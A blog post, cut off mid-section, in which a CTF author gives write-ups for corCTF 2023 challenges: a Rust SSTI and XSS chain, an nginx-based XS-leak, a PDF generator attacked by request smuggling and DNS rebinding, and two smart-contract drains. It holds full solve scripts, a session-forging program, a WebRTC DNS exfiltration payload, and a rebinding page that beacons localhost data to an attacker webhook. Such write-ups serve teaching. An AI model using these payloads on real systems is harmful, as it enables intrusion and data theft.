corCTF 2023 Challenges

Sun Aug 06 2023


corCTF 2023 Challenge Writeups

Hi! corCTF 2023 just happened, so here's my blog post talking about the event. I'm very thankful that the CTF went very well. I think that the infra this year was more stable than last year (no 0day in our admin bot this time), and there were a lot of fun challenges that players seemed to like.

I worked a lot on the infrastructure for the event, so I'm glad there were no mishaps there. Of course, the other organizers and challenge developers also did amazing, so shoutouts to them.

I contributed 7 challs out of the total 41, 3 being web, 2 blockchain, and 2 misc. Personally, I'm a bit torn about this year's web, since I think last year's web was better than this year. Sadly, I didn't really have enough time to write challenges this year, so a lot of my stuff was pretty rushed.

I did contribute 3 web, but pdf-pal was actually a challenge from corCTF 2022 that got dropped because of infra problems, and I wrote leakynote the day of the CTF. I'm at the point in my challenge writing career where I feel like I've written all the challenges I would have loved to see as a player myself. But, I still think that I have some funny ideas left...

Anyway, enough rambling, here are the writeups to my challenges.

Contents

crabspace

I'm thankful that I was spared this year from writing baby web challenges. So, the "easiest" web challenge I wrote for the event was definitely not easy.

crabspace was a Rust (😍) XSS web challenge that was quite oniony. The description was flavortext based on Elon Musk's renaming of Twitter to X (???), and it gave you links to an instancer (so your exploit could probably break the server), and an admin bot (for XSS).

Starting the instance, we see that it's a basic platform where you can create a "space", and then view it rendered as HTML.

The flag is in the admin's password, so let's work towards that.

Trying out HTML tags in our space, they seem to work! Okay, let's try some JavaScript payload! The classic <script>alert(1);</script> doesn't work, but <script>console.log(1);</script> does...

Checking the template, we see why this is the case:

<iframe sandbox="allow-scripts" srcdoc="<link rel='stylesheet' href='/public/axist.min.css' />{{ space }}" class="space"></iframe>

Our HTML code is output into the srcdoc attribute of an iframe with sandbox="allow-scripts". Basically, we have full JavaScript execution, but in a sandboxed iframe with a null origin. This means that our XSS doesn't let us access the crabspace domain. Damn.

But checking the route handler for space, routes/space.rs, we see this code:

async fn space( Extension(tera): Extension<Tera>, Path(id): Path<Uuid>, mut ctx: Context, ) -> AppResult<Response> { Ok(match USERS.get(&id) { Some(user) => { ctx.tera.insert( "space", &Tera::one_off(&user.space, &ctx.tera, true).unwrap_or_else(|_| user.space.clone()), ); ctx.tera.insert("id", &id); utils::render(tera, "space.html", ctx.tera).into_response() } None => { ctx.sess .insert("error", "Could not find the space for that user")?; Redirect::to("/").into_response() } }) }

Sorry if you can't read Rust. But basically, we see that the {{ space }} variable is actually the result of Tera::one_off(&user.space, &ctx.tera, true).unwrap_or_else(|_| user.space.clone()).

From the Tera docs, we see that Tera::one_off renders a one-off template, for example, one coming from a user. This is essentially SSTI, since we pass user input to this template engine. The unwrap_or_else part just handles the error case if the template fails to render.

By the way, this is why the challenge needed to be instanced. Using this SSTI, while you couldn't get RCE, you could DoS the server by using control structures to cause it to loop for a long time.

Okay, so what can we do with this SSTI. Well, like I mentioned earlier, you can't get RCE - there's no feature in the docs that allows you to do this. But, the get_env built-in function looks interesting!

In the provided Dockerfile, we have this line:

ENV SECRET secretsecretsecretsecretsecretsecretsecretsecretsecretsecretsecr

And in the main.rs code, we have this:

#[tokio::main] async fn main() { let store = CookieStore::new(); let secret: [u8; 64] = std::env::var("SECRET") .map(|p| p.as_bytes().try_into().expect("SECRET must be 64 bytes")) .unwrap_or_else(|_| [(); 64].map(|_| rand::thread_rng().gen())); let session_layer = SessionLayer::new(store, &secret).with_secure(false); // ...

So, the session store used by the application is a CookieStore, where the secret used comes from the SECRET environment variable! So, if we can leak the SECRET env var, we could sign our own sessions with arbitrary data (since the complete session data is stored in the cookie).

Okay, let's do this. Following Tera's format, we can leak the session with {{ get_env(name="SECRET") }}:

Nice! So the secret is bhtfvrbya2el1aj9j9yc1khanujw5sy2cnsfnixv7pe9b0ayuyki6o3ckvzzpe6m. Looking at the code, we see a lot of features reserved for admins only. Since we can't use our XSS to mess with the crabspace domain as the admin, we need to find a way to become the admin ourselves.

Using our leaked secret, we can create arbitrary sessions. Let's look at the authorization middleware:

#[async_trait] impl<S> FromRequestParts<S> for Context where S: Send + Sync, { type Rejection = Redirect; async fn from_request_parts(parts: &mut Parts, state: &S) -> Result<Self, Self::Rejection> { let Extension(session_handle): Extension<SessionHandle> = Extension::from_request_parts(parts, state) .await .expect("Session extension missing. Is the session layer installed?"); let mut sess = session_handle.write_owned().await; let mut tera = tera::Context::new(); if let Some(err) = sess.get::<String>("error") { sess.remove("error"); tera.insert("error", &err); } if let Some(info) = sess.get::<String>("info") { sess.remove("info"); tera.insert("info", &info); } let mut user: Option<User> = None; if let Some(id) = sess.get::<Uuid>("id") { user = USERS.get(&id).map(|v| User { pass: "".to_string(), ..v.clone() }); tera.insert("user", &user); } Ok(Context { tera, sess, user }) } }

Okay, so at the top of the function, it gets the Session extension. Then at the bottom, it tries to get "id" from the session. If it exists, it runs USERS.get(&id), and sets that to our user. Okay, what is USERS? In db.rs, we see this:

#[derive(Debug, Serialize, Clone)] pub struct User { pub id: Uuid, pub name: String, pub pass: String, pub following: Vec<Uuid>, pub followers: Vec<Uuid>, pub space: String, } pub static USERS: Lazy<DashMap<Uuid, User>> = Lazy::new(DashMap::new); pub static NAMES: Lazy<DashMap<String, Uuid>> = Lazy::new(DashMap::new);

Okay, so there's a User struct, holding an id which is a Uuid (specifically Uuidv4). Then, the USERS variable is a DashMap (read: HashMap) of user ids to users, and NAMES is a DashMap of usernames to user ids. Interesting.

So, if we can leak the admin's id, we can forge a session as them and become admin! But, how do we leak the admin's session? Well, we have an XSS, and we haven't used it yet...

Let's look at the space.rs code again:

async fn space( Extension(tera): Extension<Tera>, Path(id): Path<Uuid>, mut ctx: Context, ) -> AppResult<Response> { Ok(match USERS.get(&id) { Some(user) => { ctx.tera.insert( "space", &Tera::one_off(&user.space, &ctx.tera, true).unwrap_or_else(|_| user.space.clone()), ); ctx.tera.insert("id", &id); utils::render(tera, "space.html", ctx.tera).into_response() } None => { ctx.sess .insert("error", "Could not find the space for that user")?; Redirect::to("/").into_response() } }) }

In the line Tera::one_off(&user.space, &ctx.tera, true), the first argument is the user template, the second argument is the context, and the last parameter is whether we want to autoescape. Okay, so &ctx.tera is our context, but what does that really contain?

Well, from the Tera docs:

A magical variable is available in every template if you want to print the current context: __tera_context.

So, what does {{ __tera_context }} give us?

We see the id of the current user? Sadly, the pass field is cleared. Actually, in the session middleware code above, we can see exactly where this comes from:

user = USERS.get(&id).map(|v| User { pass: "".to_string(), ..v.clone() }); tera.insert("user", &user);

Okay, so then doing {{ user.id }}, our SSTI places the current user's id. So, if we have {{ user.id }} in our space, and the admin visits our space, their id will be loaded! Then, we just have to find some way to exfiltrate their id!

Sadly, this is a little difficult. Let's take a look at the security middleware:

pub async fn security<B>(req: Request<B>, next: Next<B>) -> AppResult<Response> { let mut res = next.run(req).await; let headers = res.headers_mut(); headers.insert( "Content-Security-Policy", HeaderValue::try_from( [ "default-src 'none'", "style-src 'self'", "script-src 'unsafe-inline'", "frame-ancestors 'none'", ] .join("; "), )?, ); headers.insert( "Cross-Origin-Opener-Policy", HeaderValue::from_static("same-origin"), ); headers.insert("X-Frame-Options", HeaderValue::from_static("DENY")); headers.insert("Cache-Control", HeaderValue::from_static("no-cache, no-store")); Ok(res) }

So, there's a CSP of default-src 'none'; style-src 'self'; script-src 'unsafe-inline'; frame-ancestors 'none', there's a Cross-Origin-Opener-Policy: same-origin header, a X-Frame-Options: DENY header, and a Cache-Control: no-cache, no-store header.

This makes it very hard to leak anything. Since default-src is 'none', we can't redirect the space frame since frame-src is 'none'. Since the space frame is sandboxed, we can't create a popup via window.open, nor access anything in the parent frame. Since Cross-Origin-Opener-Policy: same-origin is there, we can't do window.parent.opener to access a cross origin opener. How fun.

Well, this is the same exact situation as corCTF 2021's challenge web/msgme, and it's the perfect time to use WebRTC! I know of a few bypasses that can leak data no matter what the CSP is, but DNS prefetching doesn't work on headless: true, and the others are secret :^).

Anyway, in web/msgme the WebRTC payload was really large, and the space has a maximum length of 200 characters. So, the method used there won't directly work. But, messing around with it, you will find that it can leak stuff through DNS. Here's my WebRTC payload:

<script>pc = new RTCPeerConnection({"iceServers":[{"urls":["stun:{{user.id}}." + DNS_LEAK]}]});pc.createOffer({offerToReceiveAudio:1}).then(o=>pc.setLocalDescription(o));</script>

You can probably get it much shorter than this. For DNS_LEAK I used the wonderful mess with dns site, which you should totally check out.

Okay, so with this we can leak the admin's id! Now we need to write some code to forge the session. Since it uses Bincode to encode stuff, it's easier to write this in Rust. Here's my payload:

use async_session::{CookieStore, SessionStore}; use async_session::{ base64, hmac::{Hmac, Mac, NewMac}, sha2::Sha256, }; use axum_extra::extract::cookie::Key; const BASE64_DIGEST_LEN: usize = 44; #[tokio::main] async fn main() { let store = CookieStore::new(); let mut secret = String::new(); std::io::stdin().read_line(&mut secret).unwrap(); let mut sid = String::new(); std::io::stdin().read_line(&mut sid).unwrap(); let mut target_id = String::new(); std::io::stdin().read_line(&mut target_id).unwrap(); let (_, value) = sid.split_at(BASE64_DIGEST_LEN); let mut session = store.load_session(value.trim().to_string()).await.unwrap().unwrap(); session.insert("id", target_id.trim()).unwrap(); let value = store.store_session(session).await.unwrap().unwrap(); let key = Key::from(secret.trim().as_bytes()); let mut mac = Hmac::<Sha256>::new_from_slice(key.signing()).expect("good key"); mac.update(value.as_bytes()); let mut new_value = base64::encode(mac.finalize().into_bytes()); new_value.push_str(&value); println!("{new_value}"); }

With this, we can become admin. Now, the admin account can't edit their space or follow any user (remnants from when this was going to be a non-instanced challenge), but they have access to an admin panel, which they can see on any user (besides the admin).

The admin panel shows information about the user, specifically, fields in the UserView struct. Here it is:

#[derive(Serialize)] struct UserView { id: Uuid, name: String, following: Vec<User>, followers: Vec<User>, space: String, } impl From<User> for UserView { fn from(u: User) -> Self { UserView { id: u.id, name: u.name, following: u .following .iter() .filter_map(|f| USERS.get(f).map(|f| f.clone())) .collect(), followers: u .followers .iter() .filter_map(|f| USERS.get(f).map(|f| f.clone())) .collect(), space: u.space, } } }

So, the UserView struct has fields id, name, following, followers, and space. Looking at the template, we see that the following and followers vectors allow custom sorting via a URL argument. This would be fine and all, but the above struct actually has a terrible bug in it!

The following and followers fields should be Vec<UserView>, not Vec<User>! The only difference between a User and a UserView is that a User struct has a password field. Since the list of follow(ing/ers) is a list of Users, the context passed to the template actually contains the password of each follow(er).

While their password is not shown directly, it can be indirectly leaked through sorting, via ?sort=pass. So, if we follow the admin and a bunch of other accounts, we can sort by passwords, leaking the admin's password, which is the flag!

Here's my solve script:

from pwn import * import requests import string import random import sys import re context.arch = 'amd64' context.log_level = 'CRITICAL' TARGET = "https://web-crabspace-crabspace-f44db99d2c2f302d.be.ax" ADMIN_ID = "d2361b7a-0b07-4f72-937d-880aa3b3f45b" DNS_LEAK = "lilac201.messwithdns.com" KNOWN = "corctf{" LEAK_PAYLOAD = """<script>pc = new RTCPeerConnection({"iceServers":[{"urls":["stun:{{user.id}}.""" + DNS_LEAK + """"]}]});pc.createOffer({offerToReceiveAudio:1}).then(o=>pc.setLocalDescription(o));</script>""" UUID_PATTERN = r'"\/space\/(.*?)"' ORDER_PATTERN = r'<tr>\n <td>.*?</td>\n <td>(.*?)</td>' SPACE_PATTERN = r'axist\.min\.css\' \/>(.*?)"' ALPHABET = string.ascii_lowercase + string.digits + "_}" ALPHABET = ''.join(sorted([c for c in ALPHABET])) + "~~" def randstr(): alphabet = list(string.ascii_lowercase + string.digits) return ''.join([random.choice(alphabet) for _ in range(32)]) def forge(secret, uuid): assert len(secret) == 64 s, _ = register() base_sid = s.cookies.get("sid") p = process("./target/release/crabspace-sol") p.sendline(secret.encode()) p.sendline(base_sid.encode()) p.sendline(uuid.encode()) new_cookie = p.readline() return new_cookie.decode().strip() def register(password = None): if not password: password = randstr() assert len(password) >= 7 s = requests.Session() r = s.post(f"{TARGET}/api/register", data={"name": randstr(), "pass": password}) assert r.status_code == 200 return s, re.findall(UUID_PATTERN, r.text)[0] def set_space(s, space): r = s.post(f"{TARGET}/api/space", data={"space": space}) assert r.status_code == 200 def get_space(id): r = requests.get(f"{TARGET}/space/{id}") assert r.status_code == 200 return re.findall(SPACE_PATTERN, r.text)[0] def follow(s, id): r = s.post(f"{TARGET}/api/follow", data={"id": id}) assert r.status_code == 200 def get_order(admin, target_id): r = admin.get(f"{TARGET}/admin/{target_id}?sort=pass") return re.findall(ORDER_PATTERN, r.text) def get_user(sid): s, _ = register() for c in s.cookies: c.value = sid return s def oracle(admin, target, target_id, query): _, query_id = register(query) follow(target, query_id) order = get_order(admin, target_id) assert len(order) == 2 res = order[0] == 'admin' follow(target, query_id) return res secret_leaker, secret_leaker_id = register() set_space(secret_leaker, '{{ get_env(name="SECRET") }}') SECRET = get_space(secret_leaker_id) print(f"[!] Found secret: {SECRET}") if not ADMIN_ID: rtc, rtc_id = register() set_space(rtc, LEAK_PAYLOAD) print(f"[!] Send this URL to the admin: {TARGET}/space/{rtc_id}") print(f"[!] Once you do so, check DNS_LEAK to find the admin's id") ADMIN_ID = input("[ID] > ") print(f"[!] Found admin id: {ADMIN_ID}") admin_sid = forge(SECRET, ADMIN_ID) admin = get_user(admin_sid) if "Login" in admin.get(TARGET).text: print("[!] The saved ADMIN_ID variable is invalid, please set it again") sys.exit(1) else: print("[!] Logged in as admin successfully") target, target_id = register() follow(target, ADMIN_ID) assert get_order(admin, target_id) == ['admin'] print("[!] Followed admin account as target") print("[!] Starting search...") while not KNOWN.endswith("}"): prev = "" for c in ALPHABET: if oracle(admin, target, target_id, KNOWN + c): if c == "}": KNOWN += c break KNOWN = prev print(f"[FLAG] {KNOWN}") break prev = KNOWN + c print(f"[!] Found flag: {KNOWN}")

Quite long, but it does it all automatically. With that, we can get the flag:

corctf{b3tter_name_th4n_x}

leakynote

From the title, you can guess that this is an XS-Leak challenge. It's written in PHP (🤮), served with nginx.

Larry (EhhThing) was my co-author for this challenge. He discovered the nginx quirk used in this challenge. I wrote the challenge around that, and found an XS-Leak to solve. As I said before, I wrote this challenge the day of the CTF, but what people don't know is that I actually only created a working solve script 2 hours before the CTF 🙃.

Okay, so the challenge is very similar to crabspace, except this time there's no JavaScript execution. We can create our own notes with arbitrary HTML, but they're subject to a strict CSP: script-src 'none'; object-src 'none'; frame-ancestors 'none';.

There's a search functionality, where you can search in your own notes. If there are no notes found with that query, it returns 404, usually something that we can use to leak. But, since there is an object-src 'none', we can't use the HTML-only <object> 404 leak. And since the cookies are SameSite=lax by default, we can't use the probeError script from the XS-Leaks wiki. We can't leak anything with this alone.

The first step is realizing the quirk with the CSP. The CSP is added by nginx, in nginx.conf:

server { listen 80; server_name _; index index.php; root /www; location / { try_files $uri $uri/ /index.php?$query_string; add_header Content-Security-Policy "script-src 'none'; object-src 'none'; frame-ancestors 'none';"; location ~ \.php$ { try_files $uri =404; fastcgi_pass unix:/run/php-fpm.sock; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include fastcgi_params; } } }

What Larry mentioned to me is that add_header only adds the header to successful HTTP responses, so a 404 would be missing the CSP header. Quirky. It's missing the keyword always in this case.

So what does that let us do? Well, the search page has no HTML injection, so the removal of script-src and object-src are useless to us. But removing frame-ancestors is interesting...

This means that with our HTML injection, we can iframe the search page.

If the search returned some results, it wouldn't be a 404, so it wouldn't remove the CSP, so it would still have frame-ancestors, so the iframing would fail.

If the search didn't return anything, it would be a 404, so it would remove the CSP, so it wouldn't have frame-ancestors, so the iframing would work!

This is an oracle that we can use. There were multiple solutions from this point, but I'll go over mine. If you <iframe> the search page and no results are found, it will iframe successfully, and load the /search page. This will cause some extra CSS files to load, causing some network congestion.

Now, this is exactly the same as safelist from SekaiCTF 2022! In that solution I used the connection pool leak. But others solved it simpler, by just timing how long fetchs take, so I did the same thing. If you want to see the other solutions, you should check out the #web channel in our disCoRd.

With this oracle, we can get the flag!

corctf{leakrgod}

Truly, this tweet from Ark puts it best - anything can be an oracle if you really try hard enough.

pdf-pal

I wrote pdf-pal last year, and it was an okay challenge. The first step involved an nginx-gunicorn parser differential, and our infrastructure last year could not handle that for some reason. This year, I fixed that problem, and made the challenge much harder. But, I also introduced another bug in the challenge, adding an unintended solution and making it much easier.

Sadly, very little testing goes on for corCTF, mostly because everyone writes challenges that are so esoteric that no one wants to test anyone else's challenges, so this flew under the radar. Oops!

pdf-pal is a simple tool that lets you generate PDFs from URLs, and also rename them. But uh, none of those features are enabled by default.

Checking the nginx config, we see why:

location / { proxy_pass http://localhost:7777; location ^~ /generate { allow 127.0.0.1; deny all; } location ^~ /rename { allow 127.0.0.1; deny all; } }

So, both /generate and /rename are blocked by the nginx reverse proxy, and only allowed by localhost. The first step is finding a bypass for this.

There was a hint released 24 hours in:

24 hr hint drop: the first step is to find a gunicorn and nginx parser differential... i may have installed nginx from a package manager, but that doesn't mean its up to date 🙃

Hm... Well, this technique was found by some friends in my team DiceGang during CSAW 2021's web challenge, gatekeeping. Essentially, there's a parser differential between gunicorn and nginx that allows you to request these URL paths. Here's my script:

import socket import ssl HOST = "web-pdf-pal-pdf-pal-e31d2703c0a0d142.be.ax" PORT = 8080 def generate(url): payload = f"url={url}" data = f"""POST /generate{chr(9)}HTTP/1.1/../../ HTTP/1.1 Host: {HOST}:7777 Content-Length: {len(payload)} Content-Type: application/x-www-form-urlencoded {payload} """ base_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s = ssl.create_default_context().wrap_socket(base_sock, server_hostname=HOST) s.connect((HOST, PORT)) except: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) print(data) s.sendall(data.encode()) resp = s.recv(1024) return resp.decode()

With this, we can now generate and rename any files that we want. The flag is at /flag.txt, so can we just generate a PDF of that file? Well, no. Checking the source code, we see a blacklist:

def blacklist(text, extra=()): banned = ["flag", "txt", "root", "output", "pdf-gen"] + list(extra) return any(item in text or item in unquote(text) for item in banned)

So this won't work. I think it's now a good time to explain the architecture of the application.

There are three services running in the container:

  1. a NodeJS Fastify server that runs Puppeteer to generate the PDF (port 7778)
  2. a Python Flask + Gunicorn server that serves as the front-end for the application (port 7777)
  3. nginx (port 80)

Both of the first two services (7777, 7778) are only listening on localhost, and are not exposed publicly. nginx is exposed, but only reverse proxies port 7777.

The blacklist functionality only exists on the front-end Python server. So, if we can send a request directly to :7778, we can generate a PDF of any location that we want! And we can do just that.

To generate a PDF of a site, Puppeteer (the same software running the XSS admin bots) navigates to your site, then generates the PDF. This means that JavaScript will also run, and since the admin bot is in the container, it will be on localhost.

That means that generating a PDF of a non-blacklisted site that includes JavaScript to fetch to :7778 will be able to generate a PDF for us! This lets us generate a PDF of /flag.txt.

But there's one issue - the PDF is placed at a random location, a uuid v4. We won't know where the PDF is. And since the PDF is not being generated by the front-end application, it won't be displayed there either. The response to the fetch to :7778 will contain the file location, but we won't be able to read that because of the Same Origin Policy... right?

Well, no! Enter: DNS rebinding. I won't explain this in too much detail, since I already used this technique in corCTF 2021, specifically, the saasme challenge. Check out singularity if you want a reference implementation.

But the general idea is that we use multiple A records, one with the IP for our server, then one for 0.0.0.0. When the admin bot goes to our domain, it resolves the IP for our server and loads a custom payload page. Then, we kill our server. Then, when it attempts to load a new resource on the same-origin, it can't access it at our IP (since our server is dead), and so falls back to 0.0.0.0, reading a localhost resource. Since this is same-origin, we can read the response.

const express = require("express"); const app = express(); app.get("/", (req, res) => { res.sendFile("exploit.html", { root: "." }); }); app.get("/kill", (req, res) => { console.log("killed!"); process.exit(); }); app.listen(7778, () => console.log("listening on 7778"));
<script> let log = (id, data) => { navigator.sendBeacon("//WEBHOOK//?" + id, data); }; let pwn = async () => { log("running"); try { let data = await (await fetch("/generate", { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ url: "file:///flag.txt" }) })).text(); log("rebind", btoa(encodeURIComponent(data))); } catch(e) { log("rebind_error", e.message); } }; fetch(location.origin + "/kill"); setTimeout(pwn, 4000); </script> <img src="http://server.brycec.me:3001/api/delay/60" /> <img src="http://server.brycec.me:3001/api/delay/60" /> <img src="http://server.brycec.me:3001/api/delay/60" /> <img src="http://server.brycec.me:3001/api/delay/60" /> <img src="http://server.brycec.me:3001/api/delay/60" /> <img src="http://server.brycec.me:3001/api/delay/60" /> <img src="http://server.brycec.me:3001/api/delay/60" /> <img src="http://server.brycec.me:3001/api/delay/60" />

Make sure to also set up your DNS correctly to use these scripts.

So, using multiple answers DNS rebinding we can read a cross-origin response. You might be wondering why this doesn't completely make the SOP useless - since the domain is different, cookies and localStorage are not shared with the real domain.

But still, there's a problem. There's a queue system implemented for PDF generation:

let generating = false; setInterval(async () => { if (generating || queue.length === 0) return; const { url, resolve, reject } = queue.shift(); console.log(`Navigating to: ${url}`); try { generating = true; const pdf = await pdfbot.generate(url); generating = false; resolve({ pdf, hash: sha256(await fsp.readFile(`./output/${pdf}`)) }); } catch (err) { console.log(err); generating = false; reject(err); } }, 500);

So, it only generates one PDF at a time, which means only one browser session will be active at a time. This is a problem!

Think about how this would work:

  1. we start generating a PDF in browser instance A
  2. browser instance A navigates to our exploit site
  3. browser instance A makes a request to /generate on 7778 with /flag.txt
  4. this can't start since there's a queue, so browser instance A has to die first
  5. once browser instance A dies, we start generating a PDF in browser instance B
  6. ...

So, we won't be able to use browser instance A to read the response from browser instance B! Well, take a look at the PDF generation code directly:

const puppeteer = require("puppeteer"); const crypto = require("crypto"); const generate = async (url) => { const browser = await puppeteer.launch({ headless: true, args: [ '--no-sandbox', '--disable-setuid-sandbox', '--js-flags=--noexpose_wasm,--jitless' // this is a web chall :> ], dumpio: true, pipe: true, // lmao no executablePath: process.env.PUPPETEER_EXEC_PATH }); const page = await browser.newPage(); await page.goto(url, { waitUntil: "networkidle0" }); const pdf = `${crypto.randomUUID()}.pdf`; await page.pdf({ path: `./output/${pdf}` }); await browser.close(); return pdf; }; module.exports = { generate };

Notice an issue here? It's very subtle, but there's no error handling code! If any one of these lines errors, the browser will stay active. The queue implementation will know something went wrong, but without access to the browser instance, it can't kill it.

So, if we try to do DNS rebinding and cause an error, our instance won't be killed, allowing it to last longer than the instance generating a PDF, allowing us to read the response. You can just do this by loading resources that take longer than 30 seconds (the default timeout) to load, since we're waiting for networkidle0 (or in other words, all resources to finish loading).

Okay, now, we have the file location of a PDF generated from /flag.txt. I'll just go over the solution that both teams used at this point, since it's a lot easier than mine.

If you check the source for the front-end application, you'll see that it only renders PDFs from the list of PDFs it knows about, so we can't use it to read our flag PDF.

But interestingly, when the front-end sends over a PDF, it uses this code:

@app.route("/view/<requested_file>") def view(requested_file): for file in files: if file["pdf"] == requested_file: path = os.path.abspath("/pdf-gen/output/" + file["pdf"]) if not path.startswith("/pdf-gen/output/"): return abort(400, ":lemonthink:") with open(path, "rb") as pdf: data = pdf.read() sha256 = hashlib.sha256(data).hexdigest() if sha256 != file["hash"]: return abort(400, ":lemonthink:") return send_file(io.BytesIO(data), attachment_filename=file["pdf"], mimetype='application/pdf') return abort(404)

Why is this interesting? Well, it serves a PDF from disk, opening it using open. But, for some reason, the internal PDF generating back-end has this code:

fastify.register(require('@fastify/static'), { root: path.join(__dirname, 'output'), });

So, the back-end has an unused Fastify middleware to serve PDFs itself! That means that by accessing :7778/<pdfname.pdf>, we can load the PDF. From there, we can just use the same DNS rebinding technique to exfiltrate the flag PDF and get the flag.

The intended solution was just to use drive-by-downloading and the rename function to get an HTML file in this folder, then just fetch the flag. But this wasn't necessary.

corctf{y0u_are_a_pdf_pr0digy!!!}

baby-wallet

baby-wallet was the first blockchain challenge in the CTF, and it was an easy Ethereum challenge.

Provided were two smart contracts, Setup.sol and BabyWallet.sol. Since they're both short, I'll just post them here:

pragma solidity ^0.8.17; import "./BabyWallet.sol"; contract Setup { BabyWallet public wallet; constructor() payable { require(msg.value == 100 ether, "requires 100 ether"); wallet = new BabyWallet(); payable(address(wallet)).transfer(msg.value); } function isSolved() public view returns (bool) { return address(wallet).balance == 0 ether; } }
pragma solidity ^0.8.17; contract BabyWallet { mapping(address => uint256) public balances; mapping(address => mapping(address => uint256)) public allowances; function deposit() public payable { balances[msg.sender] += msg.value; } function withdraw(uint256 amt) public { require(balances[msg.sender] >= amt, "You can't withdraw that much"); balances[msg.sender] -= amt; (bool success, ) = msg.sender.call{value: amt}(""); require(success, "Failed to withdraw that amount"); } function approve(address recipient, uint256 amt) public { allowances[msg.sender][recipient] += amt; } function transfer(address recipient, uint256 amt) public { require(balances[msg.sender] >= amt, "You can't transfer that much"); balances[msg.sender] -= amt; balances[recipient] += amt; } function transferFrom(address from, address to, uint256 amt) public { uint256 allowedAmt = allowances[from][msg.sender]; uint256 fromBalance = balances[from]; uint256 toBalance = balances[to]; require(fromBalance >= amt, "You can't transfer that much"); require(allowedAmt >= amt, "You don't have approval for that amount"); balances[from] = fromBalance - amt; balances[to] = toBalance + amt; allowances[from][msg.sender] = allowedAmt - amt; } fallback() external payable {} receive() external payable {} }

The Setup contract just deploys your instance, funds the BabyWallet contract with 100 ether, and defines the win condition - drain the BabyWallet contract to 0 ether.

This was my first Solidity smart contract I've written, so the bug was very simple: a transferFrom call with from == to would double your balance. Run it through in your head if you don't see why.

This requires that allowances[from][msg.sender] is greater than or equal to your amount, so you have to call approve on yourself first. Here's my exploit contract:

pragma solidity ^0.8.17; import "../contracts/BabyWallet.sol"; import "../contracts/Setup.sol"; contract Exploit { constructor(address target) payable { Setup setup = Setup(target); BabyWallet wallet = BabyWallet(setup.wallet()); wallet.deposit{value: 100 ether}(); wallet.approve(address(this), 100 ether); wallet.transferFrom(address(this), address(this), 100 ether); wallet.withdraw(200 ether); } }

We first deposit 100 ether, then approve transfering 100 ether to ourself. Then, we use the transferFrom bug to double our balances amount to 200 ether. Then, we can withdraw all 200 ether (the 100 starting ether, and the 100 we deposited). This completely drains the contract, fulfilling the win condition.

corctf{inf1nite_m0ney_glitch!!!}

tribunal

tribunal was the second blockchain challenge, and the harder one of the two. It was a Solana smart contract, and it actually built off of the solidarity challenge from last year's corCTF, fixing all of the major bugs.

Connecting to the challenge, we see this:

Just like last year, it's a sort of bootleg governance setup. You can vote to donate lamports to a proposal. The admin can withdraw the funds from the vault PDA at any time.

There are three bugs in the contract:

  1. use of non-canonical bumps
  2. underflow in vote()
  3. config.total_balance is not decremented after withdraw (this one I accidentally left in)

I'll explain the bugs as best I can (but I am a blockchain noob so this might be slightly inaccurate).

To understand the first bug you need to first understand PDAs. Program Derived Addresses (PDAs) in Solana are accounts on the blockchain with no private key, often used to store variables or as a hashmap. They allow smart contracts to sign for accounts, but since they have no private key, no other user can generate signatures for that account.

PDAs are not created by the contract directly, they are found, with a list of seeds (a list of strings), and their parent program ID. The program ID and seeds run through a hash function (SHA256), and then they are checked to see if they generate a public key lying on the Ed25519 elliptic curve. If they lie on the curve, this is a problem, since they are not supposed to have a private key.

To stop PDAs from having a private key, they need to be bumped off of the Ed25519 curve. To do this, a bump seed (a number) is used to modify the input and hopefully bump it off of the curve. To find a PDA address, they start with a bump seed of 255, and it decrements until a bump is found where the output does not lie on the curve. There's around a 50% chance that the hash results in a valid public key, so with 256 chances (255 down to 0) the chance no PDA found is negligble.

The first bump that results in a valid PDA (one that does not lie on the curve) is called the canonical bump. However, the issue is that there are other valid bumps that can also result in a valid PDA that aren't the canonical bump.

To see why this is an issue, let's look at initialize() in the contract.

#[repr(C)] #[derive(BorshSerialize, BorshDeserialize)] pub struct Config { pub discriminator: Types, pub admin: Pubkey, pub total_balance: u64, } // ... // initialize config, should only run once fn initialize( program: &Pubkey, accounts: &[AccountInfo], config_bump: u8, vault_bump: u8, ) -> ProgramResult { let account_iter = &mut accounts.iter(); let user = next_account_info(account_iter)?; let config = next_account_info(account_iter)?; let vault = next_account_info(account_iter)?; // ensure that the user signed this if !user.is_signer { return Err(ProgramError::MissingRequiredSignature); } // get config and vault let Ok(config_addr) = Pubkey::create_program_address(&[b"CONFIG", &[config_bump]], &program) else { return Err(ProgramError::InvalidSeeds); }; let Ok(vault_addr) = Pubkey::create_program_address(&[b"VAULT", &[vault_bump]], &program) else { return Err(ProgramError::InvalidSeeds); }; // assert that the config passed in is at the right address if *config.key != config_addr { return Err(ProgramError::InvalidAccountData); } // ensure that the config passed in is empty (we only want to initialize once) if !config.data_is_empty() { return Err(ProgramError::AccountAlreadyInitialized); } // create config invoke_signed( &system_instruction::create_account( &user.key, &config_addr, Rent::minimum_balance(&Rent::default(), CONFIG_SIZE), CONFIG_SIZE as u64, &program, ), &[user.clone(), config.clone()], &[&[b"CONFIG", &[config_bump]]], )?; // ... }

The initialize() function initializes the smart contract by creating a config and vault, and it should only be run once. The config holds important variables like the admin (owner of the contract), and the total balance. Since we only want initialize to run once, we check the location of the config, and ensure that there is no data already there.

But, look at how we get the config address!

let Ok(config_addr) = Pubkey::create_program_address(&[b"CONFIG", &[config_bump]], &program) else { return Err(ProgramError::InvalidSeeds); };

config_bump comes from the user! If we were using Pubkey::find_program_address, it wouldn't take a custom bump, instead using the canonical bump by starting at 255 from decrementing. But, since we can pass in a custom bump, we can find another valid non-canonical bump to create a config PDA at.

This lets us create a new config, letting us act as admin over the smart contract, meaning we can now pass the admin check in withdraw() .

Now, our goal is to drain the vault, but the total_balance check in withdraw() stops us from doing that with our new config:

